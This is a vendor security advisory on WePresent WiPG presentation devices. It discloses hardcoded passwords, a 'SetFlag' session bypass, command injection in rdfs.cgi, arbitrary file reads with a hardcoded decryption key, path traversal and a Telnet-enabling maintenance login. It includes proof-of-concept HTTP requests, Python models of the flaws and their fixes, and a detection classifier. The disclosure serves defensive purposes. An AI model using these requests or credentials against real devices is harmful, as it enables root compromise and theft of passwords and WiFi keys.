Security Advisory: Multiple vulnerabilities in WePresent WiPG devices
--------------------------------------------------------------------------------
1. Summary
This advisory describes multiple vulnerabilities affecting the WePresent WiPG
devices. Most of the issues covered by this advisory apply to the WiPG-1000,
WiPG-1500 and the WiPG-2000. The vulnerabilities allow an unauthenticated
attacker within the same network as the device to gain administrative access to
its web interface as well as to execute arbitrary code with root privileges on
the device.
2. Vulnerable devices and versions
All vulnerabilities have been discovered on the WiPG-1000 device and are likely
to be present on the WiPG-1500 and WiPG-2000 as well but this has not been
verified in all cases. The most current version of the firmware (2.0.0.7 at the
time of writing) was used for the vulnerability research but quick cross-checks
have indicated that many vulnerabilities were present in much older firmware
versions as well.
3. Details
3.1 Web Interface Authentication Bypass
The login.cgi script contains the hardcoded password 'aw%root?' (without quotes)
for the administration area, which allows anyone with access to the network (or
anyone at all if the device is exposed to the internet) to log in without
knowing the password set by the regular administrator. This is problematic as
the administration area should not be accessible to anyone not in possession of
the correct password. In addition, it should be noted that no user can change
this hardcoded password, so the only way to get rid of it is to apply a
firmware update that no longer includes this issue.
Note: This backdoor does not appear to be present in the WiPG-2000 device.
3.2 Web Interface Privilege Escalation
When changing the administrator's password in the web form the following request
is sent:
---
POST /cgi-bin/return_test.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 96
Cache-Control: no-cache
Origin: http://192.168.100.10
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close
command=Y5orvHOhpS3nxe9eLONG_ADMIN_PWD
newpassword
---
If one logs into the conference control panel on the web UI and then sends this
exact request with their own session ID (which is easily visible in the URL
after logging in) inserted instead, the password will be changed to the new
value, allowing the attacker to log in as administrator and thus escalate their
privileges.
Note: The underlying issue here is that the session management does not
differentiate between administrative and moderator users. Instead, this
difference is handled entirely on the UI level by not showing moderator users
direct links to administrative pages. Their session is valid for administrative
access, however.
3.3 Authentication Bypass
The return_test.cgi file (/home/boa/cgi-bin/return_test.cgi) handles various
user requests, such as updating device preferences (or indeed changing passwords,
as seen in the previously described vulnerability). Such a request is sent in a
pseudo-XML format whose first field, value, contains the current session ID,
which is used to verify whether the request came from a legitimate user. If the
request is manipulated so that the string 'SetFlag' is sent in place of the
session ID (the string 'session-id-here' stands for it here), the device omits
the session ID check for this request and handles it as though it came from an
authenticated user. See below for a full proof of concept request:
---
POST /cgi-bin/return_test.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 1308
Cache-Control: no-cache
Origin: http://192.168.100.10
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: */*
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close
command=SetFlagNET_IP_TYPE
1NET_DHCP_EN1
NET_IPredactedNET_MASK
redactedNET_GATEWAYredacted
NET_DNSredactedWL_ESSID
WiPG-1000WL_SWITCH0
WL_SSID_BROADCAST1WL_MODE
9WL_CHANNEL0WL_ENCRYPT
14WL_WPAKEYredacted
WL_BANDWIDTH1APCLIENT_ONOFF
1APCLIENT_ESSIDredacted
APCLIENT_ENCRYPT_MODE7
APCLIENT_ENCRYPT_KEYredacted
SNMP_USER_NAMEadminSNMP_AUTH_PASSWORD
AuthadminSNMP_PRIV_PASSWORDPrivadmin
SNMPTRAPHOST0.0.0.0SNMP_ONOFF
1PREF_GATEKEEPER1
NTP_SYNC1NTP_SERVER_IP
TIME_ZONEGMT-8_CHDOMAIN_NAME
---
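The two authorization flaws described in 3.2 and 3.3 come down to the same missing server-side check. The following is an added illustration written for this advisory, not code from the device or the vendor: the flawed check models the behaviour reported above (any valid session is accepted for any action, and the literal 'SetFlag' skips the lookup), and the corrected check beside it ties each action to the role recorded at login. The session store, the session IDs, the role names and the action names are assumptions made for the example; the advisory does not show the internals of return_test.cgi.

```python
"""Model of the authorization flaws in 3.2 and 3.3 beside a corrected check."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Session:
    role: str  # "admin" or "moderator"


# Constructed session table standing in for the device's session store.
# The session IDs and role names are assumptions made for this example.
SESSIONS = {
    "sessAdmin0123456": Session("admin"),
    "sessModer8765432": Session("moderator"),
}

# Assumed set of actions that only an administrator should be able to perform.
ADMIN_ONLY = {"change_admin_password", "set_network_config"}


def flawed_authorize(session_id: str, action: str) -> bool:
    """Behaviour the advisory describes.

    3.3: the literal value 'SetFlag' skips the session check entirely.
    3.2: every valid session is accepted for every action, because the
    moderator/administrator distinction exists only in the UI and is not
    part of the session data consulted here.
    """
    if session_id == "SetFlag":
        return True
    return session_id in SESSIONS


def fixed_authorize(session_id: str, action: str) -> bool:
    """Corrected check: no literal value bypasses the lookup, and the role
    recorded server-side at login decides whether the action is allowed."""
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    if action in ADMIN_ONLY:
        return session.role == "admin"
    return True


def compare(session_id: str, action: str) -> tuple:
    """Return (flawed_result, fixed_result) so the difference is visible."""
    return flawed_authorize(session_id, action), fixed_authorize(session_id, action)
```

Hiding links in the UI is not an access control; the role has to be checked at the point where the privileged action is executed, as fixed_authorize does.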
3.4 OS Command Injection
The rdfs.cgi (/home/boa/cgi-bin/rdfs.cgi) script is vulnerable to command
injection. A specially crafted string in the web form leads to arbitrary
shell commands being executed on the device with root privileges. As a simple
proof of concept, insert the string `; reboot;` into the input field and press
the download button. The device will execute the command and reboot. The cause
of this vulnerability is that the user-supplied string is inserted into the
following command, which is then executed: '/bin/awenc -e -i %s -o %s'. See
below for a full proof of concept request:
---
POST /cgi-bin/rdfs.cgi HTTP/1.1
Host: 192.168.100.10
Content-Length: 37
Cache-Control: max-age=0
Origin: http://192.168.100.10
Upgrade-Insecure-Requests: 1
User-Agent: Agent
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,de;q=0.6
Connection: close
Client=%3Breboot%3B&Download=Download
---
Note: This script is assumed to be a development leftover, as it doesn't appear
to be presented to end users in any way during normal usage. If this is the
case, it should be removed from the system entirely.
3.5 Arbitrary File Disclosure
The rdfs.cgi (/home/boa/cgi-bin/rdfs.cgi) script's intended functionality is to
download an arbitrary file from the device. The encryption that is in place (the
call to the /bin/awenc binary as seen in the command injection vulnerability
above) is too weak to be any significant obstacle in exploiting this
vulnerability.
The encryption can easily be reversed by removing the first 512 bytes of an
encrypted file and then shifting the leftover bytes by the hex values of the
hardcoded key, which is '28825885"(("%((%mistral28825885' (without the single
quotes).
As there is no limitation on which file can be downloaded using this feature,
an attacker could download any file in encrypted form and then easily decrypt
its contents. This is particularly interesting as an attacker can read the
cleartext passwords chosen for the admin and moderator users, as well as the
WiFi key, by downloading the file '/tmp/scfgdndf'.
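Both 3.4 and 3.5 stem from the same construction: the form value is formatted into '/bin/awenc -e -i %s -o %s' and handed to a shell without validation. The following added example, written for this advisory and not taken from the device's code, shows that pattern beside a hardened form that builds an argv list (no shell) and restricts the input to a plain file name inside one directory, which closes the injection and the arbitrary file read at once. The directory, the output path, the function names and the sample inputs are assumptions; the example only builds the command and does not execute /bin/awenc.

```python
"""The unsafe command construction behind rdfs.cgi (3.4) beside a hardened form."""
import re
from pathlib import PurePosixPath

# Assumed locations for the example; the advisory does not name the real ones.
ALLOWED_DIR = PurePosixPath("/var/export")
OUTPUT_PATH = "/tmp/export.enc"

# Plain file names only: no '/', no whitespace, no shell metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]{1,64}")


def vulnerable_command(client_input: str) -> str:
    """The pattern the advisory reports: the raw form value is formatted into
    '/bin/awenc -e -i %s -o %s' and handed to a shell. Any ';' in the value
    ends the awenc command and starts a second one."""
    return "/bin/awenc -e -i %s -o %s" % (client_input, OUTPUT_PATH)


def hardened_command(client_input: str) -> list:
    """Validate the value and return an argv list for subprocess.run(argv)
    (no shell=True), so nothing in the value is ever parsed by a shell."""
    if client_input in (".", "..") or not SAFE_NAME.fullmatch(client_input):
        raise ValueError("disallowed file name: %r" % client_input)
    target = ALLOWED_DIR / client_input
    # SAFE_NAME admits no '/', so the joined path has exactly one extra
    # component and cannot leave ALLOWED_DIR; check that invariant anyway.
    if target.parent != ALLOWED_DIR:
        raise ValueError("path escapes the allowed directory")
    return ["/bin/awenc", "-e", "-i", str(target), "-o", OUTPUT_PATH]


def hardened_rejects(client_input: str) -> bool:
    """True when the hardened builder refuses the value."""
    try:
        hardened_command(client_input)
    except ValueError:
        return True
    return False
```

The allowlist on the file name does the real work: quoting the value for the shell would stop the injection but would still let any path on the device be read, which is the 3.5 issue.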
3.6 File Inclusion
The 'login.cgi' script (/home/boa/cgi-bin/login.cgi) contains a file inclusion
vulnerability in the 'src' parameter. The file inclusion only appears to work
for files meeting certain criteria, however, returning a 502 error for other
files. The URL
'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=../../../bin/mountstor.sh'
can be used as a proof of concept. This vulnerability doesn't appear to have any
severe impact, as we weren't able to read any files containing information that
couldn't be gained by simply extracting them from the firmware.
3.7 Insecure Maintenance Interface
Requesting the URL
'http://192.168.100.10/cgi-bin/login.cgi?lang=en&src=AwLoginRdtool.html' leads
to a login page being served by the 'login.cgi' file, which allows anyone to log
in as 'rdtool' using the hardcoded password 'mistral5885'. Once logged in, one
can enable 'manufacture mode' or 'RD Debug mode', which enables the Telnet
service on the device. The researchers were unable to discover the password for
the root account during the time spent on this research; however, anyone in
possession of that password can enable Telnet and get a shell with root
privileges on the device.
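Until the fixed firmware is deployed, the requests described in 3.3 to 3.7 are easy to recognise in traffic captured in front of the device. The following is an added detection example written for this advisory, not code from the device or the vendor: it classifies captured requests by the indicators above (the 'SetFlag' value in return_test.cgi requests, any use of rdfs.cgi and shell metacharacters in its Client field, '../' in the login.cgi src parameter, and the AwLoginRdtool.html maintenance page). The (url, body) record shape is a constructed stand-in for whatever a proxy, IDS or the device's web server actually logs, the sample traffic is constructed, and the indicator labels are assumptions.

```python
"""Classify captured HTTP requests to a WiPG device by the advisory's indicators."""
from urllib.parse import parse_qs, urlsplit

# Characters that let a form value break out of the awenc command line (3.4).
SHELL_META = set(";|&`$\n")


def classify(url: str, body: str = "") -> list:
    """Return the list of indicator labels that match one request."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    form = parse_qs(body, keep_blank_values=True)
    hits = []
    if parts.path == "/cgi-bin/login.cgi":
        for src in query.get("src", []):
            if "../" in src:
                hits.append("login.cgi src traversal (3.6)")
            if src == "AwLoginRdtool.html":
                hits.append("maintenance login page requested (3.7)")
    if parts.path == "/cgi-bin/rdfs.cgi":
        # The advisory considers rdfs.cgi a development leftover with no
        # legitimate use, so every call to it is worth a look.
        hits.append("rdfs.cgi invoked (3.4/3.5)")
        for client in form.get("Client", []):
            if SHELL_META & set(client):
                hits.append("shell metacharacters in Client (3.4)")
    if parts.path == "/cgi-bin/return_test.cgi":
        for command in form.get("command", []):
            # A real session ID is an alphanumeric token; the literal
            # 'SetFlag' in the command field is the bypass from 3.3.
            if "SetFlag" in command:
                hits.append("SetFlag session bypass (3.3)")
    return hits


# Constructed sample traffic: (request URL, decoded POST body or "").
SAMPLE = [
    ("/cgi-bin/login.cgi?lang=en", ""),
    ("/cgi-bin/login.cgi?lang=en&src=../../../bin/mountstor.sh", ""),
    ("/cgi-bin/login.cgi?lang=en&src=AwLoginRdtool.html", ""),
    ("/cgi-bin/rdfs.cgi", "Client=%3Breboot%3B&Download=Download"),
    ("/cgi-bin/return_test.cgi", "command=SetFlagNET_IP_TYPE1"),
    ("/cgi-bin/return_test.cgi", "command=sessAdmin0123456NET_IP_TYPE1"),
]


def scan(records=SAMPLE) -> list:
    """Return [(url, hits)] for every record, including records with no hits."""
    return [(url, classify(url, body)) for url, body in records]


if __name__ == "__main__":
    for url, hits in scan():
        print(url, "->", hits or "clean")
```

The last sample request carries an ordinary session ID and produces no hit, which is the check that the SetFlag rule does not fire on legitimate configuration changes.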
4. Credits
* Matthias Brun (main researcher)
* Sven Vetsch
* Dominik Nufer
5. Timeline
* 2017-02-17 Made initial contact with vendor.
* 2017-02-20 Sent advisory to vendor and received confirmation of receipt.
* 2017-03-20 Asked about status. Vendor confirmed the issues have been
triaged and are being fixed.
* 2017-03-27 Received answer confirming all items having been fixed.
* 2017-04-09 Firmware version 2.2.3.0 released, fixing (according to the vendor)
all disclosed vulnerabilities.
* 2017-04-20 Public disclosure of advisory.
6. About Redguard
Redguard is a Swiss-based information security company. We assist our clients
with technical security testing as well as organisational security audits and
consulting. This enables us to have a team with extensive experience in a wide
variety of security relevant topics.
https://www.redguard.ch
contact@redguard.ch
7. Disclaimer
This document is not meant to be a complete list of security issues for any of
the mentioned devices and/or versions. It is possible and indeed likely that
there are further security issues that are yet to be identified.
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. Use of the information
constitutes acceptance for use in an AS IS condition. There are no warranties
with regard to this information. Neither the author nor the publisher accepts
any liability for any direct, indirect, or consequential loss or damage arising
from use of, or reliance on, this information.